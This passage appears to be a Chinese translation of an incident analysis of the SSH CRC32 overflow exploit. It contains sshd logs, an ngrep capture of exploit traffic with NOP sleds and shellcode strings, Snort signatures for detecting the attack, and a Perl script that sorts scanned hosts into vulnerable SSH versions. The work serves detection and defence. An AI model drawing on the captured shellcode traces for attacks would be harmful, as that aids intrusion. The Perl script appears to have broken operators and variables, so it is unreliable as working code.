Nov 1 18:48:17 victim sshd[9611]: fatal: Local: Corrupted check bytes on input.
Nov 1 18:48:17 victim sshd[9612]: log: Connection from 10.10.10.10 port 33399
Nov 1 18:48:18 victim sshd[9613]: log: Connection from 10.10.10.10 port 33400
Nov 1 18:48:18 victim sshd[9614]: log: Connection from 10.10.10.10 port 33401
Nov 1 18:58:18 victim sshd[9614]: fatal: Timeout before authentication.
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

注意日志條目的最后一條,如果成功利用此漏洞被入侵,認證過程就會停止,因為
此時SHELLCODE的后門程序已經(jīng)執(zhí)行,這樣你可以連接端口進行任何操作。唯一的
問題是,SSH守護程序(至少SSH.com 1.2.31)會由于認證過程不完整而超時,導致
關閉開啟的SHELL。一般在監(jiān)聽shell的父進程關閉只前會有10分鐘時間空域。

網(wǎng)絡通信信息分析
=====================

在這里使用了Tcpdump來截獲上面的攻擊行為,記錄信息在sshdx.dump,可以被用
來IDS入侵檢測系統(tǒng)獲得攻擊標志信息。如果你的IDS系統(tǒng)不支持tcpdump文件,你
可以使用"tcpreplay"[12]來轉(zhuǎn)換tcpdump信息。

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
# tcpdump -s1500 -w sshdx.dump ip host 10.10.10.3 &
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

這樣可以很容易的查看SSH守護程序產(chǎn)生的多個連接信息,使用"ngrep"[5]工具可以
辨認出最后連接和插入SHELLCODE的暴力破解攻擊信息:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
. . .


T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
  SSH-1.5-1.2.31.


T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]
  SSH-1.5-OpenSSH_2.2.0p1.


T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
  ............GA..@.......%....`..P.....D&..2.+7#...1!?..c.r).8.^.h.....
  ..I..b6..9.f........N..0....:BAh@s.e...H......(.D2.Zg......#.......\.j
  W...O$....6.......$...V..;...U.@Y.K2.p<\..o..?..l.........*.p.K<s..,..
  .@7.wBBy......1.i..%".....G*g.G.t(......M........[.......J......<.


T 10.10.10.10:32957 -> 10.10.10.3:2222 [AP]
  ............GA..@.....`G.Fg.g.!.i.}..........._.e....=../..6....;....)
  T..... c...#W.\wve.cy .n.....q.Sc....}..".N.G.w"....n.../#.....8x..&.Z
  ....Q/.......8..


T 10.10.10.3:2222 -> 10.10.10.10:32957 [AP]
  .........4..


T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
  ..W...2.......2.......2.......2.......2.......2.......2.......2.......
  2.......2.......2.......2.......2.......2.......2.......2.......2 ....
  ..2!......2$......2%......2(......2)......2,......2-......20......21..
  ....24......25......28......29......2<......2=......2@......2A......2D
  ......2E......2H......2I......2L......2M......2P......2Q......2T......
  2U......2X......2Y......2\......2]......2`......2a......2d......2e....
  ..2h......2i......2l......2m......2p......2q......2t......2u......2x..
  ....2y......2 ......2}......2.......2.......2.......2.......2.......2.
  ......2.......2.......2.......2.......2.......2.......2.......2.......
  2.......2.......2.......2.......2.......2.......2.......2.......2.....
  ..2.......2.......2.......2.......2.......2.......2.......2.......2...
  ....2.......2.......2.......2.......2.......2.......2.......2.......2.
  ......2.......2.......2.......2.......2.......2.......2.......2.......
  2.......2.......2.......2.......2.......2.......2.......2.......2.....
  ..2.......2.......2.......2.......2.......2.......3.......3.......3...
  ....3.......3.......3.......3.......3.......3.......3.......3.......3.
  ......3.......3.......3.......3.......3 ......3!......3$......3%......
  3(......3)......3,......3-......30......31......34......35......38....
  ..39......3<......3=......3@......3A......3D......3E......3H......3I..
  ....3L......3M......3P......3Q......3T......3U......3X......3Y......3\
  ......3]......3`......3a......3d........1...p}.@


T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
  ......3i......3l......3m......3p......3q......3t......3u......3x......
  3y......3 ......3}......3.......3.......3.......3.......3.......3.....
  ..3.......3.......3.......3.......3.......3.......3.......3.......3...
  ....3.......3.......3.......3.......3.......3.......3.......3.......3.
  ......3.......3.......3.......3.......3.......3.......3.......3.......
  3.......3.......3.......3.......3.......3.......3.......3.......3.....
  ..3.......3.......3.......3.......3.......3.......3.......3.......3...
  ....3.......3.......3.......3.......3.......3.......3.......3.......3.
  ......3.......3.......3.......3.......3.......4.......4.......4.......
  4.......4.......4.......4.......4.......4.......4.......4.......4.....
  ..4.......4.......4.......4.......4 ......4!......4$......4%......4(..
  ....4)......4,......4-......40......41......44......45......48......49
  ......4<......4=......4@......4A......4D......4E......4H......4I......
  4L......4M......4P......4Q......4T......4U......4X......4Y......4\....
  ..4]......4`......4a......4d......4e......4h......4i......4l......4m..
  ....4p......4q......4t......4u......4x......4y......4 ......4}......4.
  ......4.......4.......4.......4.......4.......4.......4.......4.......
  4.......4.......4.......4.......4.......4.......4.......4.......4.....
  ..4.......4.......4.......4.......4.......4.......4.......4.......4...
  ....4.......4.......4.......4.......4.......4.......4.......4.......4.
  ......4.......4.......4.......4.........1...p}.@


. . .


T 10.10.10.10:32957 -> 10.10.10.3:2222 [A]
  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................
  .....................1..f..1...C.].C.].K.M..M...1..E.Cf.].f.E.09.M..E.
  .E..E.....M.....CC....C....1..?......A....^.u.1..F..E......M..U.......
  ./bin/sh.h0h0h0, 7350, zip/TESO!......................................
  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................
  ......................................................................
  ........................................1...p}.@
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

這樣針對這個攻擊程序你可以匹配如下字符串"h0h0h0, 7350, zip/TESO!" [7] 和NOP等。

下面的特征字符串由Marty Roesch 和 Brian Caswell開發(fā)并可使用在Snort v1.8 或者
更高的版本[6]:

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
  (msg:"EXPLOIT ssh CRC32 overflow /bin/sh"; \
  flags:A+; content:"/bin/sh"; \
  reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
  classtype:shellcode-detect;)


alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
  (msg:"EXPLOIT ssh CRC32 overflow filler"; \
  flags:A+; content:" 00 00 00 00 00 00 00 00 00 00 00 00 00 "; \
  reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
  classtype:shellcode-detect;)


alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
  (msg:"EXPLOIT ssh CRC32 overflow NOOP"; \
  flags:A+; content:" 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 "; \
  reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
  classtype:shellcode-detect;)


alert tcp $EXTERNAL_NET any -> $HOME_NET 22 \
  (msg:"EXPLOIT ssh CRC32 overflow"; \
  flags:A+; content:" 00 01 57 00 00 00 18 "; offset:0; depth:7; \
  content:" FF FF FF FF 00 00 "; offset:8; depth:14; \
  reference:bugtraq,2347; reference:cve,CVE-2001-0144; \
  classtype:shellcode-detect;)
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

鑒別你的主機是否存在此漏洞
===========================

你可以使用Jeremy Mates' scan_ssh.pl[8] 和 Niels Provos' ScanSSH scanner[9]
寫的腳本來鑒別SSH服務和它們的版本。

Russell Fulton 也公布了一個腳本程序Argus[10]用來處理日志,包含在下面的附錄中。

----------------------------------------------------------------------------

參考

========

[1] Portable Linux Amazing CD (PLAC) v2.9.1pre2, by Fred Cohen
  http://www.all.net/ForensiX/plac.html


[2] Netcat, by der Hobbit
  http://www.l0pht.com/~weld/netcat/


[3] Reverse Engineer's Query Tool
  http://packetstormsecurity.org/linux/reverse-engineering/reqt-0.7f.tar.gz


[4] LiSt Open Files (lsof)
  http://sunsite.securitycentralhq.com/mirrors/security/lsof/lsof.tar.gz


[5] ngrep, by Jordan Ritter
  http://www.packetfactory.net/projects/ngrep/


[6] Snort
  http://www.snort.org/


[7] 7350.org / 7350
  http://www.7350.org/
  http://www.team-teso.org/about.php (see the bottom)


[8] Jeremy Mates 提供的ssh_scan.pl
  http://sial.org/code/perl/scripts/ssh_scan.pl.html


[9] Niels Provos提供的ScanSSH 掃描程序
  http://www.monkey.org/~provos/scanssh/


[10] Argus - 網(wǎng)絡傳輸審核工具
  http://www.pl.freebsd.org/es/ports/net.html#argus-1.8.1


[11] tcpdump
  http://staff.washington.edu/dittrich/misc/sshdx.dump


[12] tcpreplay
  http://packages.debian.org/testing/net/tcpreplay.html



Appendix A
==========


兩個掃描腳本如下

=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#!/usr/bin/perl
#
# ssh-report
#
# Dave Dittrich <dittrich@cac.washington.edu>
# Thu Nov 8 21:39:20 PST 2001
#
# Process output of scans for SSH servers, with version identifying
# information, into two level break report format by SSH version.
#
# This script operates on a list of scan results that look
# like this:
#
# % cat scanresults
# 10.0.0.1 beavertail.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.2 lumpysoup.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.3 marktwain.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
# 10.0.0.4 junebug.dept.foo.edu SSH-1.5-1.2.31
# 10.0.0.10 calvin.dept.foo.edu SSH-1.99-OpenSSH_2.5.2p2
# 10.0.0.11 hobbes.dept.foo.edu SSH-1.99-OpenSSH_2.1.1
# 10.0.0.20 willow.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
# 10.0.0.21 berry.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
# 10.0.0.23 whimpy.dept.foo.edu SSH-1.99-OpenSSH_2.9p2
#
# The resulting report (without the "-a" flag) will look like this:
#
# % ssh-report < scanresults
#
# SSH-1.5-1.2.31 (affected)
# beavertail.dept.foo.edu(10.0.0.1)
# lumpysoup.dept.foo.edu(10.0.0.2)
# junebug.dept.foo.edu(10.0.0.4)
#
#
# SSH-1.99-OpenSSH_2.1.1 (affected)
# hobbes.dept.foo.edu(10.0.0.11)
#
# By default, this script will only report on those systems that
# are running potentially vulnerable SSH servers. Use the "-a"
# option to report on all servers. Use "grep -v" to filter out
# hosts *before* you run them through this reporting script.
#
# SSH servers are considered "affected" if they are known, by being
# listed in one or more of the following references, to have the crc32
# compensation attack detector vulnerability:
#
# http://www.kb.cert.org/vuls/id/945216
# http://www.securityfocus.com/bid/2347/
# http://xforce.iss.net/alerts/advise100.php
# http://www.ssh.com/products/ssh/advisories/ssh1_crc-32.cfm
#
# You also may need to adjust the logic below to lump systems
# into the "Unknown" category correctly (e.g., if your server
# has a custom version string, access control, etc.)
#
# The list below of servers and potential vulnerability was derived by
# summarizing existing versions on a set of production networks and
# using the advisories and reference material listed above. You
# should update this list as new information is obtained, or if new
# versions of the SSH server are found on your network.


%affected = (
'Unknown', 'unknown',
'SSH-1.4-1.2.14', 'not affected',
'SSH-1.4-1.2.15', 'not affected',
'SSH-1.4-1.2.16', 'not affected',
'SSH-1.5-1.2.17', 'not affected',
'SSH-1.5-1.2.18', 'not affected',
'SSH-1.5-1.2.19', 'not affected',
'SSH-1.5-1.2.20', 'not affected',
'SSH-1.5-1.2.21', 'not affected',
'SSH-1.5-1.2.22', 'not affected',
'SSH-1.5-1.2.23', 'not affected',
'SSH-1.5-1.2.24', 'affected',
'SSH-1.5-1.2.25', 'affected',
'SSH-1.5-1.2.26', 'affected',
'SSH-1.5-1.2.27', 'affected',
'SSH-1.5-1.2.28', 'affected',
'SSH-1.5-1.2.29', 'affected',
'SSH-1.5-1.2.30', 'affected',
'SSH-1.5-1.2.31', 'affected',
'SSH-1.5-1.2.31a', 'not affected',
'SSH-1.5-1.2.32', 'not affected',
'SSH-1.5-1.3.7', 'not affected',
'SSH-1.5-Cisco-1.25', 'unknown',
'SSH-1.5-OSU_1.5alpha1', 'unknown',
'SSH-1.5-OpenSSH-1.2', 'affected',
'SSH-1.5-OpenSSH-1.2.1', 'affected',
'SSH-1.5-OpenSSH-1.2.2', 'affected',
'SSH-1.5-OpenSSH-1.2.3', 'affected',
'SSH-1.5-OpenSSH_2.5.1', 'not affected',
'SSH-1.5-OpenSSH_2.5.1p1', 'not affected',
'SSH-1.5-OpenSSH_2.9p1', 'not affected',
'SSH-1.5-OpenSSH_2.9p2', 'not affected',
'SSH-1.5-RemotelyAnywhere', 'not affected',
'SSH-1.99-2.0.11', 'affected w/Version 1 fallback',
'SSH-1.99-2.0.12', 'affected w/Version 1 fallback',
'SSH-1.99-2.0.13', 'affected w/Version 1 fallback',
'SSH-1.99-2.1.0.pl2', 'affected w/Version 1 fallback',
'SSH-1.99-2.1.0', 'affected w/Version 1 fallback',
'SSH-1.99-2.2.0', 'affected w/Version 1 fallback',
'SSH-1.99-2.3.0', 'affected w/Version 1 fallback',
'SSH-1.99-2.4.0', 'affected w/Version 1 fallback',
'SSH-1.99-3.0.0', 'affected w/Version 1 fallback',
'SSH-1.99-3.0.1', 'affected w/Version 1 fallback',
'SSH-1.99-OpenSSH-2.1', 'affected',
'SSH-1.99-OpenSSH_2.1.1', 'affected',
'SSH-1.99-OpenSSH_2.2.0', 'affected',
'SSH-1.99-OpenSSH_2.2.0p1', 'affected',
'SSH-1.99-OpenSSH_2.3.0', 'not affected',
'SSH-1.99-OpenSSH_2.3.0p1', 'not affected',
'SSH-1.99-OpenSSH_2.5.1', 'not affected',
'SSH-1.99-OpenSSH_2.5.1p1', 'not affected',
'SSH-1.99-OpenSSH_2.5.1p2', 'not affected',
'SSH-1.99-OpenSSH_2.5.2p2', 'not affected',
'SSH-1.99-OpenSSH_2.9.9p2', 'not affected',
'SSH-1.99-OpenSSH_2.9', 'not affected',
'SSH-1.99-OpenSSH_2.9p1', 'not affected',
'SSH-1.99-OpenSSH_2.9p2', 'not affected',
'SSH-1.99-OpenSSH_3.0p1', 'not affected',
'SSH-2.0-1.1.1', 'unknown',
'SSH-2.0-2.3.0', 'affected w/Version 1 fallback',
'SSH-2.0-2.4.0', 'affected w/Version 1 fallback',
'SSH-2.0-3.0.0', 'affected w/Version 1 fallback',
'SSH-2.0-3.0.1', 'affected w/Version 1 fallback',
'SSH-2.0-OpenSSH_2.5.1p1', 'not affected',
'SSH-2.0-OpenSSH_2.5.2p2', 'not affected',
'SSH-2.0-OpenSSH_2.9.9p2', 'not affected',
'SSH-2.0-OpenSSH_2.9p2', 'not affected',
);


# Make SURE you read the code first.
&IKnowWhatImDoing();


$all++, shift(@ARGV) if $ARGV[0] eq "-a";


while (<>) {
  chop;
  s/\s+/ /g;
  ($ip, $host, $version) = split(' ', $_);


  # Adjust this to identify other strings reported
  # by servers that have access restrictions, etc.
  # in place and do not show a specific version number.
  # They all fall under the category "Unknown" in this case.
  $version = "Unknown"
  if ($version eq "Couldn't"

  $version eq "Unknown"

  $version eq "You"

  $version eq "timeout");


  $server = $host;
}


foreach $i (sort keys %server) {
  ($version,$ip) = split(":", $i);
  next if ($affected eq "not affected" && ! $all);
  printf("\n\n%s (%s)\n", $version, $affected)
  if ($curver ne $version);
  $curver = $version;
  print " " . $server . "($ip)\n";
}


exit(0);


sub IKnowWhatImDoing {
  local $IKnowWhatImDoing = 0;


  # Uncomment the following line to make this script work.
  # $IKnowWhatImDoing++;
  die "I told you to read the code first, didn't I?\n"
  unless $IKnowWhatImDoing;
  return;
}
=-=-=-=-=-=-=-=-=-=-=-=-=-=- cut here -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=